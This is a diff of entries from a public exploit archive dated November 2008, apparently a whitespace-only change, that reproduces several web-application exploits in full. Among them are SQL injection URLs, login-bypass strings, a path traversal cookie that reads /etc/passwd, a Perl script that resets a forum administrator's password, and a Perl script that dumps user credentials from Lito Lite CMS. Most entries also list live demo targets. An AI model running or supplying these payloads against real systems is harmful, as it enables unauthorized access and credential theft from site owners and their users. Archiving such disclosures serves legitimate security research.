¦ -¦ Download : http://www.businessvein.com/php-tv-portal.html ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ -¦ ¦ - -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - - -ExploiT : - -http://localhost/tv_portal/index.php?mid=[SQL] - -[SQL]=-11+union+select+1,version(),3,4-- - -Live demo : - -http://www.businessvein.com/tv_portal/index.php?mid=-11+union+select+1,version(),3,4-- - -Raha Nayda Nood -Mgharba :) - - -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -+---- ThanX To ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -= [AttaCk Is CompLet] = 
-___________________________________________________________________________________________________________________________________________________________ - -# milw0rm.com [2008-11-29] +*********************************************************************************************************************************************************** +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!] O O O O O [!] +[!] O O O [!] +[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!] O OOO OOO O O O O OO O O O O OO O O O [!] +[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!] O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO WwW.Exploiter5.CoM , WwW.No-ExploiT.CoM , WwW.IQ-TY.CoM [!] +*********************************************************************************************************************************************************** ++---- Bismi Allah Irahmani ArraHim ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [ PHP TV Portal<= 2.0 (mid) Remote SQL Injection ] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: Author : Cyber-Zone ( Abdelkhalek) : : : +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ TeaM : Mor0ccan Nightmares ¦ ¦ ¦ +¦ Script : http://www.businessvein.com/ ¦ ¦ ![ 4 ]! 
¦ +¦ Download : http://www.businessvein.com/php-tv-portal.html ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: : +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ + +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + + +ExploiT : + +http://localhost/tv_portal/index.php?mid=[SQL] + +[SQL]=-11+union+select+1,version(),3,4-- + +Live demo : + +http://www.businessvein.com/tv_portal/index.php?mid=-11+union+select+1,version(),3,4-- + +Raha Nayda Nood +Mgharba :) + + ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ ++---- ThanX To ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ += [AttaCk Is CompLet] = 
+___________________________________________________________________________________________________________________________________________________________ + +# milw0rm.com [2008-11-29] diff --git a/platforms/php/webapps/7285.txt b/platforms/php/webapps/7285.txt index b7667c7cc..1babe574f 100755 --- a/platforms/php/webapps/7285.txt +++ b/platforms/php/webapps/7285.txt @@ -1,24 +1,24 @@ -Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation -Vendor: CMS Made Simple -Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...) -Author: M4ck-h@cK -Date 29.11.2008 -Home: sweet home -contact: no, thx :) - -Exploit: - - -Demo: on h[ttp://demo.cmsmadesimple.fr/admin/] - -GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0 -Accept: */* -User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) -Host: demo.cmsmadesimple.fr -Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1 -Connection: Close -Pragma: no-cache - -It's possible to set "cms_language" value in order to view /etc/passwd file. - -# milw0rm.com [2008-11-29] +Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation +Vendor: CMS Made Simple +Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...) +Author: M4ck-h@cK +Date 29.11.2008 +Home: sweet home +contact: no, thx :) + +Exploit: + + +Demo: on h[ttp://demo.cmsmadesimple.fr/admin/] + +GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0 +Accept: */* +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) +Host: demo.cmsmadesimple.fr +Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1 +Connection: Close +Pragma: no-cache + +It's possible to set "cms_language" value in order to view /etc/passwd file. + +# milw0rm.com [2008-11-29] diff --git a/platforms/php/webapps/7286.txt b/platforms/php/webapps/7286.txt index 5ba0a8c08..6841a4672 100755 
--- a/platforms/php/webapps/7286.txt +++ b/platforms/php/webapps/7286.txt @@ -1,29 +1,29 @@ -........................ - -.............................................. -+++++Bypass Config Download Vulnerability+++++ -............................................... - -script:Oramon = Oracle Database Monitoring - -++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -download:http://www.oramon.org/downloads/oramon.tar.gz - -++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -expl: - -$USERID= -$PASSWORD= -$DATABASE= - -www.site.com/path/config/oramon.ini - - -++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - | | | | | | -Author: ahmadbady - | | | | | | -my mail: kivi_hacker666@yahoo.com | | | | | | -++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - -# milw0rm.com [2008-11-29] +........................ + +.............................................. ++++++Bypass Config Download Vulnerability+++++ +............................................... + +script:Oramon = Oracle Database Monitoring + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +download:http://www.oramon.org/downloads/oramon.tar.gz + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +expl: + +$USERID= +$PASSWORD= +$DATABASE= + +www.site.com/path/config/oramon.ini + + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + | | | | | | +Author: ahmadbady + | | | | | | +my mail: kivi_hacker666@yahoo.com | | | | | | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +# milw0rm.com [2008-11-29] diff --git a/platforms/php/webapps/7290.txt b/platforms/php/webapps/7290.txt index 4ec54ab9d..91afc467c 100755 --- a/platforms/php/webapps/7290.txt +++ b/platforms/php/webapps/7290.txt 
@@ -1,24 +1,24 @@ - [~]Tybe : Remote Blind SQL Injection Vulnerability - - [~]Vendor : www.activewebsoftwares.com - - [~]Software : Active Bids - - [~]author : Mountassif Moad - - - -http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1 - -http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0 - -Demo : - -http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1 - -http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0 - - -# you can exploting the bug white blind sql automatic toolz such as sqlmap or ... - -# milw0rm.com [2008-11-29] + [~]Tybe : Remote Blind SQL Injection Vulnerability + + [~]Vendor : www.activewebsoftwares.com + + [~]Software : Active Bids + + [~]author : Mountassif Moad + + + +http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1 + +http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0 + +Demo : + +http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1 + +http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0 + + +# you can exploting the bug white blind sql automatic toolz such as sqlmap or ... + +# milw0rm.com [2008-11-29] diff --git a/platforms/php/webapps/7291.pl b/platforms/php/webapps/7291.pl index 443fa525c..7cfa5d7d0 100755 --- a/platforms/php/webapps/7291.pl +++ b/platforms/php/webapps/7291.pl 
@@ -1,156 +1,156 @@ -#!/usr/bin/perl -w -#======================================================== -#OpenForum 0.66 Beta Remote Reset Admin Password Exploit -#======================================================== -# -# ,--^----------,--------,-----,-------^--, -# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. -# `+---------------------------^----------| -# `\_,-------, _________________________| -# / XXXXXX /`| / -# / XXXXXX / `\ / -# / XXXXXX /\______( -# / XXXXXX / -# / XXXXXX / -# (________( -# `------' -# -#AUTHOR : CWH Underground -#DATE : 29 November 2008 -#SITE : cwh.citec.us -# -# -##################################################### -#APPLICATION : OpenForum -#VERSION : 0.66 Beta -#DOWNLOAD : http://downloads.sourceforge.net/openforum/openforum066.zip -###################################################### -####################################################################################### -#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK -#Special Thx : asylu3, str0ke, citec.us, milw0rm.com -####################################################################################### - -use LWP; -use HTTP::Request; -use HTTP::Request::Common; - -print "\n==================================================\n"; -print " Openforum 0.66 beta Remote Reset Admin Password exploit \n"; -print " \n"; -print " Discovered By CWH Underground \n"; -print "==================================================\n"; -print " \n"; -print " ,--^----------,--------,-----,-------^--, \n"; -print " | ||||||||| `--------' | O \n"; -print " `+---------------------------^----------| \n"; -print " `\_,-------, _________________________| \n"; -print " / XXXXXX /`| / \n"; -print " / XXXXXX / `\ / \n"; -print " / XXXXXX /\______( \n"; -print " / XXXXXX / \n"; -print " / XXXXXX / .. CWH Underground Hacking Team .. 
\n"; -print " (________( \n"; -print " `------' \n"; -print " \n"; - -if ($#ARGV ne 2) { - print "Usage: ./openforum.pl <url-to-index-page> <user account> <new password>\n"; - print "Ex. ./openforum.pl http://www.target.com/openforum/index.php admin cwhpass\n"; - exit(); -} - -$url = $ARGV[0]; -$user = $ARGV[1]; -$newpass = $ARGV[2]; - -if ($url !~ /^http:\/\//) { - $url = "http://".$url; -} - -print "[+] Target url: ".$url."\n\n"; - -$req = HTTP::Request->new (GET => $url); -$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18'); -$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'); -$req->header (Accept_Language => 'en-us,en;q=0.5'); - -$ua = LWP::UserAgent->new; -$response = $ua->request ($req); - -if ($response->code ne 200) { - print "Error: Could not request for index page\n"; - exit (); -} - -$header = $response->headers->as_string; - -($sessid) = $header =~ /sessid=(.+)\n/; -print ":: Retreive session id ::\n"; -print "[+] ".$sessid."\n\n"; - -$url =~ s/index\.php$/profile.php?user=$user/; - -#print $url; - - - -$req = HTTP::Request->new (GET => $url); -$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18'); -$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'); -$req->header (Accept_Language => 'en-us,en;q=0.5'); -$req->header (Cookie => 'sessid='.$sessid.'; userid='.$user); - -$response = $ua->request ($req); -if ($response->code ne 200) { - print "Error: Could not request for ".$user."'s profile page\n"; - exit (); -} - -$content = $response->content; -$update = "1"; -$adminaction = ""; -($email) = $content =~ /\"email\" value=\"(.*?)\"/; -($signature) = $content =~ /\"signature\">(.*?)<\/textarea>/; -$day = ""; -$month = ""; -$year = ""; -($website) = $content =~ 
/\"website\" value=\"(.*?)\"/; -($name) = $content =~ /\"name\" value=\"(.*?)\"/; -($phone) = $content =~ /\"phone\" value=\"(.*?)\"/; -($city) = $content =~ /\"city\" value=\"(.*?)\"/; -($location) = $content =~ /\"location\" value=\"(.*?)\"/; -$sytle = ""; -$submit = "Update!"; - - -print ":: Update new password ::\n\n"; -$url =~ s/\?user=admin//; - - -$response = $ua->request (POST $url, - User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18', - Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', - Accept_Language => 'en-us,en;q=0.5', - Cookie => 'sessid='.$sessid.'; userid='.$user, - Content_Type => 'form-data', - Content => [update => $update, user => $user, adminaction => '', email => $email, signature => $signature, website => $website, name => $name, - phone => $phone, city => $city, location => $location, password => $newpass, submit => $submit] -); - -if ($response->code ne 200) { - print "Error: Could not request for profile page\n"; - exit (); -} - -$content = $response->content; - -if ($content =~ /<br>updated<br><table width=\"100%\">/) { - print "[+] Exploit Success\n"; - print "[+] New admin's password: ".$newpass."\n"; -} -else -{ - print "[+] Exploit Failed\n"; -} - -# milw0rm.com [2008-11-29] +#!/usr/bin/perl -w +#======================================================== +#OpenForum 0.66 Beta Remote Reset Admin Password Exploit +#======================================================== +# +# ,--^----------,--------,-----,-------^--, +# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+# `+---------------------------^----------| +# `\_,-------, _________________________| +# / XXXXXX /`| / +# / XXXXXX / `\ / +# / XXXXXX /\______( +# / XXXXXX / +# / XXXXXX / +# (________( +# `------' +# +#AUTHOR : CWH Underground +#DATE : 29 November 2008 +#SITE : cwh.citec.us +# +# +##################################################### +#APPLICATION : OpenForum +#VERSION : 0.66 Beta +#DOWNLOAD : http://downloads.sourceforge.net/openforum/openforum066.zip +###################################################### +####################################################################################### +#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK +#Special Thx : asylu3, str0ke, citec.us, milw0rm.com +####################################################################################### + +use LWP; +use HTTP::Request; +use HTTP::Request::Common; + +print "\n==================================================\n"; +print " Openforum 0.66 beta Remote Reset Admin Password exploit \n"; +print " \n"; +print " Discovered By CWH Underground \n"; +print "==================================================\n"; +print " \n"; +print " ,--^----------,--------,-----,-------^--, \n"; +print " | ||||||||| `--------' | O \n"; +print " `+---------------------------^----------| \n"; +print " `\_,-------, _________________________| \n"; +print " / XXXXXX /`| / \n"; +print " / XXXXXX / `\ / \n"; +print " / XXXXXX /\______( \n"; +print " / XXXXXX / \n"; +print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; +print " (________( \n"; +print " `------' \n"; +print " \n"; + +if ($#ARGV ne 2) { + print "Usage: ./openforum.pl <url-to-index-page> <user account> <new password>\n"; + print "Ex. 
./openforum.pl http://www.target.com/openforum/index.php admin cwhpass\n"; + exit(); +} + +$url = $ARGV[0]; +$user = $ARGV[1]; +$newpass = $ARGV[2]; + +if ($url !~ /^http:\/\//) { + $url = "http://".$url; +} + +print "[+] Target url: ".$url."\n\n"; + +$req = HTTP::Request->new (GET => $url); +$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18'); +$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'); +$req->header (Accept_Language => 'en-us,en;q=0.5'); + +$ua = LWP::UserAgent->new; +$response = $ua->request ($req); + +if ($response->code ne 200) { + print "Error: Could not request for index page\n"; + exit (); +} + +$header = $response->headers->as_string; + +($sessid) = $header =~ /sessid=(.+)\n/; +print ":: Retreive session id ::\n"; +print "[+] ".$sessid."\n\n"; + +$url =~ s/index\.php$/profile.php?user=$user/; + +#print $url; + + + +$req = HTTP::Request->new (GET => $url); +$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18'); +$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'); +$req->header (Accept_Language => 'en-us,en;q=0.5'); +$req->header (Cookie => 'sessid='.$sessid.'; userid='.$user); + +$response = $ua->request ($req); +if ($response->code ne 200) { + print "Error: Could not request for ".$user."'s profile page\n"; + exit (); +} + +$content = $response->content; +$update = "1"; +$adminaction = ""; +($email) = $content =~ /\"email\" value=\"(.*?)\"/; +($signature) = $content =~ /\"signature\">(.*?)<\/textarea>/; +$day = ""; +$month = ""; +$year = ""; +($website) = $content =~ /\"website\" value=\"(.*?)\"/; +($name) = $content =~ /\"name\" value=\"(.*?)\"/; +($phone) = $content =~ /\"phone\" value=\"(.*?)\"/; +($city) = $content =~ /\"city\" value=\"(.*?)\"/; 
+($location) = $content =~ /\"location\" value=\"(.*?)\"/; +$sytle = ""; +$submit = "Update!"; + + +print ":: Update new password ::\n\n"; +$url =~ s/\?user=admin//; + + +$response = $ua->request (POST $url, + User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18', + Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', + Accept_Language => 'en-us,en;q=0.5', + Cookie => 'sessid='.$sessid.'; userid='.$user, + Content_Type => 'form-data', + Content => [update => $update, user => $user, adminaction => '', email => $email, signature => $signature, website => $website, name => $name, + phone => $phone, city => $city, location => $location, password => $newpass, submit => $submit] +); + +if ($response->code ne 200) { + print "Error: Could not request for profile page\n"; + exit (); +} + +$content = $response->content; + +if ($content =~ /<br>updated<br><table width=\"100%\">/) { + print "[+] Exploit Success\n"; + print "[+] New admin's password: ".$newpass."\n"; +} +else +{ + print "[+] Exploit Failed\n"; +} + +# milw0rm.com [2008-11-29] diff --git a/platforms/php/webapps/7294.pl b/platforms/php/webapps/7294.pl index 17bd0167a..75e741fe5 100755 --- a/platforms/php/webapps/7294.pl +++ b/platforms/php/webapps/7294.pl 
@@ -1,92 +1,92 @@ -#!/usr/bin/perl -w -#=========================================================== -# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit -#=========================================================== -# -# ,--^----------,--------,-----,-------^--, -# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. -# `+---------------------------^----------| -# `\_,-------, _________________________| -# / XXXXXX /`| / -# / XXXXXX / `\ / -# / XXXXXX /\______( -# / XXXXXX / -# / XXXXXX / -# (________( -# `------' -# -#AUTHOR : CWH Underground -#DATE : 29 November 2008 -#SITE : cwh.citec.us -# -# -##################################################### -#APPLICATION : Lito Lite CMS -#DOWNLOAD : http://www.lovedesigner.net/files/download/lito_lite.zip -###################################################### -# -#Note: magic_quotes_gpc = off -# -####################################################################################### -#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK -#Special Thx : asylu3, str0ke, citec.us, milw0rm.com -####################################################################################### - - -use LWP::UserAgent; -use HTTP::Request; - -if ($#ARGV+1 != 2) -{ - print "\n==============================================\n"; - print " Lito Lite Remote SQL Injection Exploit \n"; - print " \n"; - print " Discovered By CWH Underground \n"; - print "==============================================\n"; - print " \n"; - print " ,--^----------,--------,-----,-------^--, \n"; - print " | ||||||||| `--------' | O \n"; - print " `+---------------------------^----------| \n"; - print " `\_,-------, _________________________| \n"; - print " / XXXXXX /`| / \n"; - print " / XXXXXX / `\ / \n"; - print " / XXXXXX /\______( \n"; - print " / XXXXXX / \n"; - print " / XXXXXX / .. CWH Underground Hacking Team .. 
\n"; - print " (________( \n"; - print " `------' \n"; - print " \n"; - print "Usage : ./xpl.pl <Target> <Data Limit>\n"; - print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n"; - exit(); -} - -$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0]; -$number = $ARGV[1]; - -print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++"; -print "\n ..:: SQL Injection Exploit By CWH Underground ::.. "; -print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; -print "\n[+]Dump Username and Password\n"; - -for ($start=0;$start<$number;$start++) { - -$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n"; -$res = $xpl->request($req); -$info = $res->content; -$count=$start+1; - -if ($info =~ /:::(.+):::/) -{ -$dump=$1; -($username,$password)= split('::',$dump); -printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n"; -} -else { - print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n"; - exit; -} -} - -# milw0rm.com [2008-11-29] +#!/usr/bin/perl -w +#=========================================================== +# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit +#=========================================================== +# +# ,--^----------,--------,-----,-------^--, +# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+# `+---------------------------^----------| +# `\_,-------, _________________________| +# / XXXXXX /`| / +# / XXXXXX / `\ / +# / XXXXXX /\______( +# / XXXXXX / +# / XXXXXX / +# (________( +# `------' +# +#AUTHOR : CWH Underground +#DATE : 29 November 2008 +#SITE : cwh.citec.us +# +# +##################################################### +#APPLICATION : Lito Lite CMS +#DOWNLOAD : http://www.lovedesigner.net/files/download/lito_lite.zip +###################################################### +# +#Note: magic_quotes_gpc = off +# +####################################################################################### +#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK +#Special Thx : asylu3, str0ke, citec.us, milw0rm.com +####################################################################################### + + +use LWP::UserAgent; +use HTTP::Request; + +if ($#ARGV+1 != 2) +{ + print "\n==============================================\n"; + print " Lito Lite Remote SQL Injection Exploit \n"; + print " \n"; + print " Discovered By CWH Underground \n"; + print "==============================================\n"; + print " \n"; + print " ,--^----------,--------,-----,-------^--, \n"; + print " | ||||||||| `--------' | O \n"; + print " `+---------------------------^----------| \n"; + print " `\_,-------, _________________________| \n"; + print " / XXXXXX /`| / \n"; + print " / XXXXXX / `\ / \n"; + print " / XXXXXX /\______( \n"; + print " / XXXXXX / \n"; + print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; + print " (________( \n"; + print " `------' \n"; + print " \n"; + print "Usage : ./xpl.pl <Target> <Data Limit>\n"; + print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n"; + exit(); +} + +$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0]; +$number = $ARGV[1]; + +print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++"; +print "\n ..:: SQL Injection Exploit By CWH Underground ::.. 
"; +print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; +print "\n[+]Dump Username and Password\n"; + +for ($start=0;$start<$number;$start++) { + +$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n"; +$res = $xpl->request($req); +$info = $res->content; +$count=$start+1; + +if ($info =~ /:::(.+):::/) +{ +$dump=$1; +($username,$password)= split('::',$dump); +printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n"; +} +else { + print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n"; + exit; +} +} + +# milw0rm.com [2008-11-29] diff --git a/platforms/php/webapps/7299.txt b/platforms/php/webapps/7299.txt index 0cbd3af0e..b54697c4a 100755 --- a/platforms/php/webapps/7299.txt +++ b/platforms/php/webapps/7299.txt 
@@ -1,42 +1,42 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ - [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability - - [~]Vendor:www.activewebsoftwares.com - - [~]Software: Active Photo Gallery v 6.2 - - [~]author: ((я3d D3v!L)) - - [~] Date: 28.11.2008 - - [~] Home: www.ahacker.biz - - [~] contact: N/A - -[~] -----------------------------{str0ke}------------------------------ - - - [~] Exploit: - - username: r0' or ' 1=1-- - password: r0' or ' 1=1-- - - - [~]login 4 d3m0: - - http://www.activewebsoftwares.com/demoactivephotogallery/account.asp - - [~]-----------------------------{str0ke}--------------------------------------------------- - - [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker - [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري - [~] - [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller - [~] - [~] xp10.biz & ahacker.biz - [~] - - [~]-------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-30] +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ + [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability + + [~]Vendor:www.activewebsoftwares.com + + [~]Software: Active Photo Gallery v 6.2 + + [~]author: ((я3d D3v!L)) + + [~] Date: 28.11.2008 + + [~] Home: www.ahacker.biz + + [~] contact: N/A + +[~] -----------------------------{str0ke}------------------------------ + + + [~] Exploit: + + username: r0' or ' 1=1-- + password: r0' or ' 1=1-- + + + [~]login 4 d3m0: + + http://www.activewebsoftwares.com/demoactivephotogallery/account.asp + + [~]-----------------------------{str0ke}--------------------------------------------------- + + [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker + [~] + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] + [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller + [~] + [~] xp10.biz & ahacker.biz + [~] + + 
[~]-------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-30] diff --git a/platforms/php/webapps/7301.txt b/platforms/php/webapps/7301.txt index 919a2fcd7..85c3b7866 100755 --- a/platforms/php/webapps/7301.txt +++ b/platforms/php/webapps/7301.txt @@ -1,40 +1,40 @@ -########################################################################### -#-----------------------------OffensiveTrack------------------------------# -########################################################################### - - - - - - - -#found by : OffensiveTrack -#Author : AlpHaNiX -#website : www.offensivetrack.org -#contact on mail & msn : AlpHa@Hacker.bz - - - - - -########################################################################### - - - - -#script : Active timebilling -#€xploit : http://www.activewebsoftwares.com/demoactivetimebilling/Account.asp - - - username: r0' or ' 1=1-- - password: r0' or ' 1=1-- - - - - - -#greetz : My Best Friend Zigma - -########################################################################### - -# milw0rm.com [2008-11-30] +########################################################################### +#-----------------------------OffensiveTrack------------------------------# +########################################################################### + + + + + + + +#found by : OffensiveTrack +#Author : AlpHaNiX +#website : www.offensivetrack.org +#contact on mail & msn : AlpHa@Hacker.bz + + + + + +########################################################################### + + + + +#script : Active timebilling +#€xploit : http://www.activewebsoftwares.com/demoactivetimebilling/Account.asp + + + username: r0' or ' 1=1-- + password: r0' or ' 1=1-- + + + + + +#greetz : My Best Friend Zigma + +########################################################################### + +# milw0rm.com [2008-11-30] diff --git a/platforms/php/webapps/7303.txt b/platforms/php/webapps/7303.txt index 97e2ad28f..126a4e8bb 100755 
--- a/platforms/php/webapps/7303.txt +++ b/platforms/php/webapps/7303.txt 
@@ -1,61 +1,61 @@ -*********************************************************************************************************************************************************** -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!] O O O O O [!] -[!] O O O [!] -[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!] O OOO OOO O O O O OO O O O O OO O O O [!] -[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!] O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO WwW.Exploiter5.CoM ; No-ExploiT.CoM ; WwW.IQ-TY.CoM [!] -*********************************************************************************************************************************************************** -+---- Bismi Allah Irahmani ArraHim ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [ Quick Tree View .NET v 3.1 (qtv.mdb) Remote Database Disclosure Vulnerability ] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: Author : Cyber-Zone ( Abdelkhalek ) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version 